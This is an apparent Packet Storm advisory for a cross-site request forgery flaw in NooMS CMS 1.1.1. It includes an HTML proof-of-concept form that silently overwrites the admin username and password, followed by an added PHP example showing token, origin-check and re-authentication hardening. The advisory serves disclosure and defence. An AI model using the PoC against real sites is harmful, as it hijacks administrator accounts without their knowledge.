NooMS CMS 1.1.1 Cross Site Request Forgery

2011-04-10T00:00:00
ID PACKETSTORM:100262
Type packetstorm
Reporter loneferret
Modified 2011-04-10T00:00:00

Description

# NooMS CMS version 1.1.1 CSRF  
# Bug Found: April 9th 2011  
# Found by: loneferret (as far as I know anyway)  
# Software Download Link:  
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2  
# Nods to exploit-db Team  
  
  
# Well, I didn't have much to do this morning so figured I'd try to see how  
# long it would take me to find one of these. It's nothing to write home about.  
# I mean...come on! Who would use a CMS named NooMS? This thing uses a MySQL  
# database as well, wouldn't be surprised if there are other things to be found.  
# But I need to get some chores done before the wife starts.  
  
#  
# Enjoy,  
# loneferret  
#  
# p.s:  
# I wanted to contact the creator, but his page (using NooMS) is  
# blank... nothing there so.. sorry.  
  
---HTML STARTS HERE---  
  
<!-- CSRF PoC: admin.php dispatches on op/action. op=pref&action=edit saves the site  
     preferences, including the admin username and password, straight from the POST  
     body. No anti-CSRF token and no current password are required, so any page the  
     logged-in admin visits can submit this form on their behalf. Replace [host]. -->  
<form action='http://[host]/admin.php' method='post'>  
<input type='hidden' name='op' value='pref'>  
<input type='hidden' name='action' value='edit'>  
  
<!-- new credentials: these overwrite the existing admin login -->  
Admin Username: <input type='text' size='20' name='admin_user' value=''><br>  
Admin Password: <input type='text' size='20' name='admin_pwd' value=''><br>  
<!-- remaining preference fields, submitted alongside -->  
Site Name: <input type='text' size='40' name='site_name' value=''><br>  
Site URL: <input type='text' size='40' name='site_url' value=''><br>  
Number of results per page: <input type='text' size='10' name='search_numr' value=''><br>  
Lang: <input type='text' size='10' name='lang' value='en'><br>  
Theme: <input type='text' name='template' value='default'>  
<input type='submit' value='change'>  
</form>  
  
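The PoC works because the preferences handler accepts any POST that carries op=pref and action=edit. The following is an added example of how such a handler is hardened; it is not NooMS code, and the file layout (prefs.json), the function names, the PHP 7.3+ requirement, and the current_pwd field are all assumptions. It combines a per-session synchronizer token checked in constant time, an Origin/Referer host check as defence in depth, a SameSite session cookie, and re-authentication with the current password before the admin login can be rotated.

```php
<?php
// Added example (not NooMS code): CSRF-resistant "op=pref&action=edit" handler.
// Assumptions: PHP 7.3+, admin UI over HTTPS, settings stored in prefs.json,
// the form posts a current_pwd field in addition to the fields in the PoC.
declare(strict_types=1);

// Session cookie the browser will not attach to cross-site POSTs.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

const PREFS_FILE = __DIR__ . '/prefs.json';   // assumed settings store

function load_prefs(): array
{
    $json = @file_get_contents(PREFS_FILE);
    return $json === false ? [] : ((array) json_decode($json, true));
}

function save_prefs(array $prefs): void
{
    file_put_contents(PREFS_FILE, json_encode($prefs), LOCK_EX);
}

/** Per-session synchronizer token, created on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Abort unless the POST carries the session token and (if present) a same-host Origin/Referer. */
function csrf_check(): void
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $sent     = (string) ($_POST['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $sent)) {   // constant-time compare
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
    $src = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($src !== '') {
        $srcHost = parse_url($src, PHP_URL_HOST);
        $ourHost = (string) parse_url('//' . ($_SERVER['HTTP_HOST'] ?? ''), PHP_URL_HOST);
        if (!is_string($srcHost) || $ourHost === '' || strcasecmp($srcHost, $ourHost) !== 0) {
            http_response_code(403);
            exit('Cross-site request rejected');
        }
    }
}

function verify_admin_password(string $candidate): bool
{
    $hash = (string) (load_prefs()['admin_pwd_hash'] ?? '');
    return $hash !== '' && password_verify($candidate, $hash);
}

/** Copy only known fields (no mass assignment); store the new password as a hash. */
function apply_pref_edit(array $post): void
{
    $prefs = load_prefs();
    foreach (['admin_user', 'site_name', 'site_url', 'lang', 'template'] as $key) {
        if (isset($post[$key])) {
            $prefs[$key] = (string) $post[$key];
        }
    }
    if (isset($post['search_numr'])) {
        $prefs['search_numr'] = max(1, (int) $post['search_numr']);
    }
    if (($post['admin_pwd'] ?? '') !== '') {
        $prefs['admin_pwd_hash'] = password_hash((string) $post['admin_pwd'], PASSWORD_DEFAULT);
    }
    save_prefs($prefs);
}

/** The legitimate form: identical to the PoC except for the token and current_pwd fields. */
function render_pref_form(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return "<form action='admin.php' method='post'>\n"
         . "<input type='hidden' name='op' value='pref'><input type='hidden' name='action' value='edit'>\n"
         . "<input type='hidden' name='csrf_token' value='$token'>\n"
         . "Current password: <input type='password' name='current_pwd'><br>\n"
         . "New admin username: <input type='text' name='admin_user'><br>\n"
         . "New admin password: <input type='password' name='admin_pwd'><br>\n"
         . "<input type='submit' value='change'></form>\n";
}

if (($_REQUEST['op'] ?? '') === 'pref' && ($_REQUEST['action'] ?? '') === 'edit') {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {   // GET only shows the form, never saves
        echo render_pref_form();
        exit;
    }
    csrf_check();
    if (!verify_admin_password((string) ($_POST['current_pwd'] ?? ''))) {
        http_response_code(403);
        exit('Current password required to change preferences');
    }
    apply_pref_edit($_POST);
    unset($_SESSION['csrf_token']);   // rotate the token after a sensitive change
    echo 'Preferences updated';
}
```

The token check alone defeats the posted PoC, since a third-party page cannot read the victim's session token to include it in the form. The Origin/Referer check and the SameSite cookie are redundant layers for older browsers or a token bug, and the current-password requirement means that even a token leaked through an XSS or a logging mistake is not enough to take over the admin account.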